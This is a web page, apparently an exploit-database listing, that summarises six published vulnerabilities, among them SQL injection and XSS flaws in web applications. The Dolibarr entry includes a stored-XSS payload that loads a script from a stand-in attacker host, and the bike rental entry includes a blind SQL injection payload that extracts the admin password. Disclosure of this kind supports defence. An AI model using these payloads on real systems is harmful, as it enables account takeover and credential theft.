header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Online Course Registration 1.0 – Blind Boolean-Based SQL Injection (Authenticated)

An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers with access to the username and md5 hash of any administrators. The vulnerable file is /online-course-registration/Online/pincode-verification.php. The exploit is written in Python 3 and tested on Windows 10 + XAMPP.

Dolibarr ERP-CRM 14.0.2 – Stored Cross-Site Scripting (XSS) / Privilege Escalation

Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the 'message' box. Instructions: 1. Insert this payload in the message box when creating a ticket: '><span onbeforecopy='let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);' contenteditable>test</span> 2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference. NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user. 3.Once an administrator user copies the text within the ticket the attack will launch.

Macro Expert 4.7 – Unquoted Service Path

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Online Motorcycle (Bike) Rental System 1.0 – Blind Time-Based SQL Injection (Unauthenticated)

Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials. An example payload is 'test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL; and an example execution is python3 sqliExploit.py http://localhost/bike_rental/

myfactory FMS 7.1-911 – ‘Multiple’ Reflected Cross-Site Scripting (XSS)

During a penetration test, a reflected cross-site scripting vulnerability (XSS) was found in the myfactory.FMS login form. If a user opens an attacker-prepared link to the application, attackers can run arbitrary JavaScript code in the user's browser.

WordPress Theme Enfold 4.8.3 – Reflected Cross-Site Scripting (XSS)

While navigating on WordPress sites with Enfold Theme previous than 4.8.4 version and Avia Page Builder, string “ProofOfConcept” can be reflected literally on pagination numbers. Moreover, the parameter “avia-element-paging” appears and can be used for crafting Google Dork based searches. Changing the “ProofOfConcept” text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS) vulnerability.

Recent Exploits: